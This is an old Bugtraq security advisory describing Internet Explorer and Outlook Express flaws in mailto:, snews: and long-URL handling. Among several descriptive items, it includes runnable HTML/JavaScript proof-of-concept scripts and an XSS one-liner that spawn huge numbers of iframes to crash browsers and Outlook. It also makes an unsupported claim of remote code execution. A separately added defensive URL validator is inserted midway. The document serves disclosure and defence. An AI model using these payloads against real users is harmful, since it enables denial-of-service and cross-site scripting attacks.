Internet Explorer - Multiple Vulnerabilities

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/20/04

    To: <bugtraq@securityfocus.com>
    Date: Tue, 20 Jan 2004 23:08:19 +0200
    
    

    Internet Explorer - Multiple Vulnerabilities

    Discovered by Rafel Ivgi, The-Insider.
    http://theinsider.deep-ice.com

    Every time I read about a vulnerability concerning I.E I believe more
    and more that I.E is the biggest backdoor ever.
    After the CONTENT-TYPE: bug that allowed downloading exe's as audio files
    and all the patches, I.E 6 still has parsing problems. I discovered
    that, amazingly, with another wonderful Microsoft software, I can
    force downloads on users, fake downloaded file extensions and names,
    inject scripts into the "blank" file, run a lot of different applications,
    cause a lot of errors and see the content of binary files inside I.E,
    cause a buffer overflow in Outlook and even D.O.S the system.
    Before you read the following text, I believe the most dangerous bug in I.E
    is the possibility of actively creating <iframes> or popping up new windows
    *without a limit* (only the memory limit). This makes it easy
    to create many errors, overflows, and to D.O.S internet users.

    ****************************************************************************
    Internet Explorer & Outlook Express (6.00.2600 - Fully Patched)

    Microsoft has inserted a filtering engine inside Internet Explorer. This
    engine verifies that only secure, valid and syntactically appropriate data
    is passed on to external applications.
    **************************************************
    The filtering engine skips a few important checks, such as the "MAILTO:"
    protocol. With no filtering, it allows inappropriate data to be sent to the
    default mail client.

    Example: an over-long mailto: URL built from percent-encoded non-ASCII and
    control bytes, %00 null bytes and runs of filler characters (the full URL
    is omitted here) pops up the following error message: "The default mail
    client is not properly installed".
    There should be filtering, because there cannot be an email address such as
    this one (which is accepted by the I.E plugins filter): a mailto: URL made
    of percent-encoded non-ASCII bytes and long runs of filler characters,
    containing no "@" at all (the full URL is omitted here).
    **************************************************

    This filtering engine also filters Outlook links such as the NNTP and SNTP
    protocols. However, the security hole appears when an attacker uses the
    SNEWS protocol, which has no filtering at all.

    nntp://aaaaaa.com/aaaaa - filtering active! - results in an error message.
    sntp://aaaaaaaaaaaaaaa - filtering active! - results in an error message.
    snews://aaaaaaaaaaaaa - filtering *inactive!* - results in activation of
    Outlook and server injection into Outlook.

    This security hole allows any HTML page/website to open Outlook Express and
    inject anything as if it was a valid news server. This can be a troubling
    issue if someone makes a loop that injects a huge number of fake snews
    servers: each address remains written in Outlook's news server database
    and may cause a crash or a waste of system resources.
    The simplest way to exploit this vulnerability is by XSS (Cross Site
    Scripting).
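
    As an added example (not code from the advisory or from Microsoft), here is the
    kind of uniform, scheme-aware check a browser should apply before handing a URL
    to an external mail or news client: the mailto: and snews: cases above fail for
    opposite reasons (bad bytes let through vs. no filter at all), so one validator
    with an allowlist, a length cap and byte-level checks covers both. The function
    and constant names, the limits and the sample URLs are assumptions.

```javascript
// Added example, not the advisory's code: one uniform check for URLs handed to
// external mail/news handlers. Names, limits and samples below are assumptions.
const MAX_EXTERNAL_URL_LENGTH = 2048; // assumed cap; over-long URLs are refused
const ALLOWED_HANDLER_SCHEMES = new Set(["mailto", "news", "nntp", "snews"]);
// Decode percent-escapes byte by byte; never throws on non-UTF-8 sequences.
function percentDecodeBytes(s) {
  const out = [];
  for (let i = 0; i < s.length; i++) {
    if (s[i] === "%" && /^[0-9a-fA-F]{2}$/.test(s.slice(i + 1, i + 3))) {
      out.push(parseInt(s.slice(i + 1, i + 3), 16));
      i += 2;
    } else {
      out.push(s.charCodeAt(i));
    }
  }
  return out;
}
// Returns {ok: true} or {ok: false, reason} for a candidate URL.
function checkExternalUrl(url) {
  if (url.length > MAX_EXTERNAL_URL_LENGTH) return { ok: false, reason: "too long" };
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):(.*)$/s.exec(url);
  if (!m) return { ok: false, reason: "no scheme" };
  const scheme = m[1].toLowerCase();
  if (!ALLOWED_HANDLER_SCHEMES.has(scheme)) return { ok: false, reason: "scheme not allowed" };
  const bytes = percentDecodeBytes(m[2]);
  // After decoding, NUL, other control bytes and non-ASCII are refused: the
  // mailto: example in the advisory is made of exactly such bytes.
  if (bytes.some((b) => b < 0x21 || b > 0x7e)) return { ok: false, reason: "control or non-ASCII byte" };
  const decoded = String.fromCharCode(...bytes);
  if (scheme === "mailto") {
    // Strict addr-spec: local@dotted-domain; header fields after "?" are ignored here.
    if (!/^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$/.test(decoded.split("?")[0]))
      return { ok: false, reason: "not an email address" };
  } else {
    // News-style schemes: //host[:port]/... with a plausible dotted hostname.
    const host = decoded.replace(/^\/\//, "").split("/")[0].split(":")[0];
    if (host.length > 253 || !/^[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$/.test(host))
      return { ok: false, reason: "invalid news host" };
  }
  return { ok: true };
}
// Constructed samples modelled on the advisory's cases (not its original payloads).
const SAMPLES = {
  goodMail: "mailto:user@example.com?subject=hi",
  nulMail: "mailto:%a5%e2%99aaaa%00%00user@example.com",
  bareSnews: "snews://aaaaaaaaaaaaa",
  goodSnews: "snews://news.example.com/comp.security",
  longNntp: "nntp://news.example.com/a=?b=?" + "a".repeat(5000),
};
```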

    Local example - example.html :
    -------------- Cut Here --------------
    <script>
    var i;
    for (i=1;i<1000000;i++) {
      document.write("\<iframe src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" + i + "\"\>\<\/iframe>");
    }
    document.refresh; // has no effect: document.refresh is not a DOM property
    </script>
    -------------- Cut Here --------------

    Or by XSS:

    http://>/<script>var i; for (i=1;i<1000000;i++) { document.write("\<iframe src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" + i + "\"\>\<\/iframe>"); } document.refresh; </script>

    This issue also creates a buffer overflow within Outlook Express at offset
    0x00dc735, which closes Outlook Express, slows down the system and may even
    halt low-memory machines.
    This buffer overflow in Outlook Express is HIGHLY DANGEROUS: it can cause
    remote arbitrary command execution on almost every XP machine on earth.

    Temporary fix for this problem: the first time Outlook is run by the URL
    "snews://aaaaaaaaaaaa", it asks the user whether he would like Outlook to be
    the default "SNEWS" client. Choosing "No" will solve the problem for now.
    ****************************************************************************
    Disable Backspace In I.E

    *Manually type* in the I.E address bar "http://www.yourhost.com/#" and
    press ENTER.
    No backspace!

    No special danger except abusing simple people.
    ****************************************************************************

    I.E automatically starts a download box for a file when a file with the
    same name and a ".css" extension exists in that folder.
    For example:
    http://>/styles

    This will cause an I.E download box that tries to download the file
    "styles".
    ***This happens only because a file named "styles.css" is located in that
    folder.***

    Exploit Example - example2.html :
    -------------- Cut Here --------------
    <script>
    var i;
    for (i=1;i<1000;i++) {
      document.write("\<iframe src=\"http://>/styles\"\>\<\/iframe>");
    }
    document.refresh; // has no effect: document.refresh is not a DOM property
    </script>
    -------------- Cut Here --------------

    This will execute FrontPage and will start referring the ".css" to it. For
    each file download, 2 message boxes open: 1 is the download window and 2 is
    the "can't find" error message, which reveals/enumerates the path of all
    local Temporary Internet Files folders. This quick memory overload will
    fill up FrontPage's memory and afterwards it will open the ".css" files in
    "notepad". And after it is done with notepad's memory it will try opening
    files in "open with", which is done by "rundll32.exe".
    At this point "rundll32.exe" will reach an out-of-memory overflow and will
    raise a message box for each file download attempt.
    ****************************************************************************
    I.E Long Parameter Errors

    An nntp:// URL to 62.219.131.195 whose query parameters (a=?b=?...) are
    followed by an extremely long run of "a" characters and the trailer
    file://http://ftp://www.tripod.com (the full URL is omitted here) triggers
    the long parameter error. This can be tested with all protocols: nntp://,
    sntp://, ldap://, ftp://.
    ****************************************************************************

    "Things that are unlikeable, are NOT impossible."

